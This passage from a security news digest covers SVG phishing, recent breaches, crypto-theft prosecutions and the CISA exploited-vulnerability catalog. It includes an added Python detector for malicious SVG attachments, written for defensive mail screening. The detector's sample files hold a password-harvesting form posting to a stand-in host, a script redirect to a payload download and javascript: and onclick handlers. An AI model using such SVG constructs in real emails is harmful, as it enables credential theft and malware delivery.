https://www.bleepingcomputer.com/news/security/github-projects-targeted-with-malicious-commits-to-frame-researcher/
- Phishing Emails Increasingly Use SVG Attachments To Evade Detection
"Threat actors increasingly use Scalable Vector Graphics (SVG) attachments to display phishing forms or deploy malware while evading detection. Most images on the web are JPG or PNG files, which are made of grids of tiny squares called pixels. Each pixel has a specific color value, and together, these pixels form the entire image. SVG, or Scalable Vector Graphics, displays images differently, as instead of using pixels, the images are created through lines, shapes, and text described in textual mathematical formulas in the code."
https://www.bleepingcomputer.com/news/security/phishing-emails-increasingly-use-svg-attachments-to-evade-detection/
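The reason SVG attachments need a different screen from JPG or PNG is that an SVG is an XML document: it can carry a <script> element, inline event handlers, a <foreignObject> wrapping an HTML login form, and links out to attacker infrastructure, none of which a raster image can. The following is an added example, not code from the article or any vendor, that parses an SVG with Python's standard-library XML parser and reports those constructs. The three sample files and the example.invalid domain are constructed for illustration.

```python
"""Static inspection of an SVG attachment for active or phishing content.

Added example; not code from the article or any mail-security product. The
sample SVGs and the example.invalid domain are constructed.
"""
import re
import xml.etree.ElementTree as ET

URL_ATTRS = {"href", "src", "action", "formaction", "data"}
HTML_TAGS = {"form", "input", "iframe", "embed", "object", "textarea", "button"}
EXTERNAL = re.compile(r"^\s*(https?:)?//", re.I)


def _local(name):
    # ElementTree prefixes namespaced tags/attributes with {uri}; keep the local part.
    return name.rsplit("}", 1)[-1].lower()


def inspect_svg(svg_text):
    """Return a list of findings ({'kind', 'detail'}); empty means nothing active was seen."""
    findings = []
    if re.search(r"<!ENTITY", svg_text, re.I):
        # expat does not fetch external entities, but an inline DTD in an "image" is itself suspect
        findings.append({"kind": "dtd_entity", "detail": "inline DTD entity declaration"})
    try:
        root = ET.fromstring(svg_text)
    except ET.ParseError as exc:
        findings.append({"kind": "parse_error", "detail": str(exc)})
        return findings
    for elem in root.iter():
        tag = _local(elem.tag)
        if tag == "script":
            findings.append({"kind": "script", "detail": (elem.text or "").strip()[:80]})
        elif tag == "foreignobject":
            findings.append({"kind": "foreignObject", "detail": "embedded HTML container"})
        elif tag in HTML_TAGS:
            findings.append({"kind": "html_content", "detail": f"<{tag}>"})
        for attr, value in elem.attrib.items():
            a, v = _local(attr), value.strip()
            if a.startswith("on"):  # onload, onclick, onerror, ...
                findings.append({"kind": "event_handler", "detail": f"{tag}@{a}={v[:80]}"})
            elif a in URL_ATTRS:
                low = v.lower()
                if low.startswith("javascript:"):
                    findings.append({"kind": "javascript_uri", "detail": f"{tag}@{a}"})
                elif low.startswith("data:"):
                    findings.append({"kind": "data_uri", "detail": f"{tag}@{a}"})
                elif EXTERNAL.match(v):
                    findings.append({"kind": "external_reference", "detail": f"{tag}@{a}={v[:80]}"})
    return findings


def is_suspicious(svg_text):
    """Gateway policy hook: any finding blocks the attachment (tune per environment)."""
    return bool(inspect_svg(svg_text))


# Constructed samples (not real attachments).
BENIGN_SVG = (
    '<svg xmlns="http://www.w3.org/2000/svg" width="10" height="10" viewBox="0 0 10 10">'
    '<circle cx="5" cy="5" r="4" fill="#c00"/></svg>'
)
PHISH_FORM_SVG = (
    '<svg xmlns="http://www.w3.org/2000/svg" width="400" height="300">'
    '<foreignObject width="400" height="300"><body xmlns="http://www.w3.org/1999/xhtml">'
    '<form action="https://example.invalid/collect" method="post">'
    '<input type="password" name="password"/></form></body></foreignObject></svg>'
)
SCRIPT_SVG = (
    '<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">'
    '<script type="text/javascript">window.location="https://example.invalid/Invoice.zip"</script>'
    '<rect width="10" height="10" onclick="alert(1)"/>'
    '<a xlink:href="javascript:void(0)"><text>Open</text></a></svg>'
)

if __name__ == "__main__":
    for name, sample in [("benign", BENIGN_SVG), ("form", PHISH_FORM_SVG), ("script", SCRIPT_SVG)]:
        print(name, inspect_svg(sample))
```

Legitimate SVGs exported from design tools routinely embed rasters as data: URIs, so treat data_uri on its own as informational; script, event_handler, foreignObject and javascript_uri have no business in an emailed image and are the findings a mail gateway should act on. Note that the attachment only becomes dangerous when opened in a browser; an image viewer that ignores script is not the threat model here.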
Breaches/Hacks/Leaks
- Keyboard Robbers Steal 171K Customers' Data From AnnieMac Mortgage House
"A major US mortgage lender has told customers looking to make the biggest financial transaction of their lives that an intruder broke into its systems and saw data belonging to 171,000 of them. American Neighborhood Mortgage Acceptance Company, which trades as AnnieMac Home Mortgage, said between August 21 and 23, an unknown intruder "viewed and/or copied" some customer data."
https://www.theregister.com/2024/11/15/anniemac_data_breach/
- T-Mobile Confirms It Was Hacked In Recent Wave Of Telecom Breaches
"T-Mobile confirms it was hacked in the wave of recently reported telecom breaches conducted by Chinese threat actors to gain access to private communications, call records, and law enforcement information requests. "T-Mobile is closely monitoring this industry-wide attack, and at this time, T-Mobile systems and data have not been impacted in any significant way, and we have no evidence of impacts to customer information," T-Mobile told the Wall Street Journal, which first reported about the breach. "We will continue to monitor this closely, working with industry peers and the relevant authorities.""
https://www.bleepingcomputer.com/news/security/t-mobile-confirms-it-was-hacked-in-recent-wave-of-telecom-breaches/
https://www.itnews.com.au/news/t-mobile-hacked-in-massive-chinese-breach-of-telecom-networks-613175
General News
- Bitfinex Hacker Gets 5 Years In Prison For 120,000 Bitcoin Heist
"A hacker responsible for stealing 119,754 Bitcoin in a 2016 hack on the Bitfinex cryptocurrency exchange was sentenced to five years in prison by U.S. authorities. The man, Ilya Lichtenstein, was arrested in February 2022 in Manhattan following a lengthy investigation led by the IRS, HSI, and the FBI, which managed to recover roughly 80% of the stolen cryptocurrency (94,000 Bitcoin). At the time of the theft, the 119,754 bitcoins were worth $78,000,000 but equaled $3.6 billion at the time of the seizure."
https://www.bleepingcomputer.com/news/security/bitfinex-hacker-gets-5-years-in-prison-for-120-000-bitcoin-heist/
https://thehackernews.com/2024/11/bitfinex-hacker-sentenced-to-5-years.html
https://www.bankinfosecurity.com/bitfinex-hacker-lichtenstein-sentenced-to-5-years-in-prison-a-26824
https://www.securityweek.com/man-who-stole-and-laundered-roughly-1b-in-bitcoin-is-sentenced-to-5-years-in-prison/
https://www.infosecurity-magazine.com/news/bitfinex-hacker-jailed-5-years/
https://securityaffairs.com/171029/cyber-crime/bitfinex-hacker-was-sentenced-to-5-years-in-prison.html
https://www.theregister.com/2024/11/15/bitfinix_intruder_sentenced/
- Threat Trend Report On Deep Web & Dark Web – Ransomware Groups & Cybercrime Forums And Markets Of October 2024
"This trend report on the deep web and dark web of October 2024 is sectioned into Ransomware, Forums & Black Markets, and Threat Actor. We would like to state beforehand that some of the content has yet to be confirmed to be true."
https://asec.ahnlab.com/en/84530/
- Combating The Rise Of Federally Aimed Malicious Intent
"The public sector is facing a security crisis. The acceleration of deepfake videos, AI-generated threats, and nation-state cyberattacks has put the federal government under increasing pressure to protect its employees, agencies, and the general public. Last year, the FBI, the National Security Agency (NSA), and the Cybersecurity and Infrastructure Security Agency (CISA) released details on the "growing challenge" that deepfake threats present to a range of federal agencies."
https://www.darkreading.com/vulnerabilities-threats/combating-rise-federally-aimed-malicious-intent
- Lessons From OSC&R On Protecting The Software Supply Chain
"The complexity of today's software development — a mix of open source and third-party components, as well as internally developed code — has resulted in an abundance of vulnerabilities for attackers to exploit throughout the software supply chain. We've seen the direct effects of software supply chain attacks in incidents like the MOVEit and SolarWinds breaches, revealing that no industry sector, size of company, or stage of software development is immune. According to a survey from Enterprise Strategy Group (ESG), 91% of organizations experienced at least one software supply chain security incident in 2023, and 2024 hasn't seemed any better."
https://www.darkreading.com/application-security/lessons-from-osc-r-on-protecting-the-software-supply-chain
- AI’s Impact On The Future Of Web Application Security
"In this Help Net Security interview, Tony Perez, CEO at NOC.org, discusses the role of continuous monitoring for real-time threat detection, the unique risks posed by APIs, and strategies for securing web applications. Perez also addresses how AI-driven threats are shaping the future of web security and the need for adaptive defenses."
https://www.helpnetsecurity.com/2024/11/15/tony-perez-noc-org-web-application-security/
- Critical Vulnerabilities Persist In High-Risk Sectors
"Finance and insurance sectors found to have the highest number of critical vulnerabilities, according to Black Duck. The report, which analyzes data from over 200,000 dynamic application security testing (DAST) scans conducted by Black Duck on approximately 1,300 applications across 19 industry sectors from June 2023 to June 2024, found variations in vulnerability types and remediation practices."
https://www.helpnetsecurity.com/2024/11/15/finance-industry-vulnerabilities/
- Cybersecurity Dominates Concerns Among The C-Suite, Small Businesses And The Nation
"Once relegated to the fringes of business operations, cybersecurity has evolved into a front-and-center concern for organizations worldwide. What was once considered a technical issue managed by IT departments has become a boardroom topic of utmost importance. With the rise of sophisticated cyberattacks, the growing use of generative AI by threat actors and massive data breach costs, it is no longer a question of whether cybersecurity matters but how deeply it affects every facet of modern operations."
https://securityintelligence.com/articles/cybersecurity-dominates-concerns-c-suite-small-businesses-nation/
- Indian Police Arrest Suspect In $230 Million WazirX Crypto Exchange Hack
"Delhi police have arrested a suspect allegedly linked to the theft of at least $230 million worth of cryptocurrency from the India-based platform WazirX earlier this year. The suspect, identified as Masud Alam from West Bengal, was detained on Thursday. The Indian newspaper Times of India described the arrest as “a significant breakthrough in the ongoing investigation” into the WazirX hack."
https://therecord.media/wazirx-crypto-exchange-hack-suspect-arrested-india
- Letting Chatbots Run Robots Ends As Badly As You'd Expect
"Science fiction author Isaac Asimov proposed three laws of robotics, and you'd never know it from the behavior of today's robots or those making them. The first law, "A robot may not injure a human being or, through inaction, allow a human being to come to harm," while laudable, hasn't prevented 77 robot-related accidents between 2015-2022, many of which resulted in finger amputations and fractures to the head and torso. Nor has it prevented deaths attributed to car automation and robotaxis."
https://www.theregister.com/2024/11/16/chatbots_run_robots/
https://arobey1.github.io/writing/jailbreakingrobots.html
- Will Passkeys Ever Replace Passwords? Can They?
"I have been playing around with passkeys, or as they are formally known, discoverable credentials. Think of passkeys as a replacement of passwords. They are defined in the Web Authentication (WebAuthn) specification of the W3C (World Wide Web Consortium). This work evolved from several prior efforts including those of the FIDO alliance (FIDO = Fast Identity Online)."
https://www.theregister.com/2024/11/17/passkeys_passwords/
Reference
Electronic Transactions Development Agency (ETDA)
- Botnet Exploits GeoVision Zero-Day To Install Mirai Malware
-
Known Exploited Vulnerabilities Catalog
The Known Exploited Vulnerabilities (KEV) catalog of the Cybersecurity and Infrastructure Security Agency (CISA) is a database of security vulnerabilities that have been exploited in real attacks. Its purpose is to help government agencies, private organizations and security professionals identify and manage critical vulnerabilities. The catalog is updated continuously, together with remediation guidance to prevent future attacks. Details and further guidance are available at https://www.cisa.gov/known-exploited-vulnerabilities-catalog
Reference
https://www.cisa.gov/known-exploited-vulnerabilities-catalog